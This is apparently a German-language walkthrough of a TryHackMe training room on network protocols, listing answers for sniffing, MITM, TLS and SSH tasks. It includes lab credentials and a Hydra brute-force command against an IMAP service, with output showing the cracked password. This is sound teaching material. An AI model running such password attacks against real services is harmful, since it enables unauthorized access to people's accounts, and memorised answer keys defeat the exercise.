https://tryhackme.com/room/protocolsandservers2
Task 1 Introduction
Keine Fragen in diesem Task.
Task 2 Sniffing Attack
Frage 1:
What do you need to add to the command sudo tcpdump to capture only Telnet traffic?
Telnet läuft über Port 23.
Antwort 1:
port 23
Frage 2:
What is the simplest display filter you can use with Wireshark to show only IMAP traffic?
Man kann bei Wireshark die normalen Bezeichnungen benutzen.
Antwort 2:
imap
Task 3 Man-in-the-Middle (MITM) Attack
Frage 1:
How many different interfaces does Ettercap offer?
Wir müssen die Ettercap Website besuchen und uns etwas in Ettercap einlesen.
Antwort 1:
3
Frage 2:
In how many ways can you invoke Bettercap?
Wir müssen die Bettercap Website besuchen und uns etwas in Bettercap einlesen.
Antwort 2:
3
Task 4 Transport Layer Security (TLS)
Frage 1:
DNS can also be secured using TLS. What is the three-letter acronym of the DNS protocol that uses TLS?
Diese Frage erfordert etwas Recherche. Das gesuchte Akronym bildet sich aus DNS over TLS (DoT).
Antwort 1:
DoT
Task 5 Secure Shell (SSH)
Frage 1:
Use SSH to connect to 10.10.19.155 as mark with the password XBtc49AB. Using uname -r, find the Kernel release?
└─$ ssh mark@10.10.19.155
The authenticity of host '10.10.19.155 (10.10.19.155)' can't be established.
ED25519 key fingerprint is SHA256:4UOWo7gUWFiNuFQIBMTV3Ltoc6FqZcgLeK6eFr+7paU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.155' (ED25519) to the list of known hosts.
mark@10.10.19.155's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-84-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 13 Oct 2022 04:30:08 PM UTC
System load: 0.08 Processes: 128
Usage of /: 40.6% of 6.53GB Users logged in: 0
Memory usage: 23% IPv4 address for eth0: 10.10.19.155
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Sep 20 13:36:07 2021 from 10.20.30.1
mark@bento:~$ uname -r
5.4.0-84-genericAntwort 1:
5.4.0-84-generic
Frage 2:
Use SSH to download the file book.txt from the remote system. How many KBs did scp display as download size?
mark@bento:~$ scp mark@10.10.19.155:/home/mark/book.txt ~
The authenticity of host '10.10.19.155 (10.10.19.155)' can't be established.
ECDSA key fingerprint is SHA256:a/jk5FKco5HKrL5orT81CFrihZusu13zJW+NsL4QG/g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.19.155' (ECDSA) to the list of known hosts.
mark@10.10.19.155's password:
book.txt 100% 415KB 69.3MB/s 00:00
mark@bento:~$ Antwort 2:
415
Task 6 Password Attack
Frage 1:
We learned that one of the email accounts is lazie. What is the password used to access the IMAP service on 10.10.19.155?
Hier benutzen wir also Hydra und basteln uns einen Befehl. Die Wordlist kann bei euch (je nach Speicherort) einen anderen Pfad haben.
└─$ hydra -l lazie -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.19.155 imap
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-13 18:46:59
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking imap://10.10.19.155:143/
[143][imap] host: 10.10.19.155 login: lazie password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-10-13 18:47:20
Antwort 1:
butterfly
Task 7 Summary
Keine Fragen in diesem Task.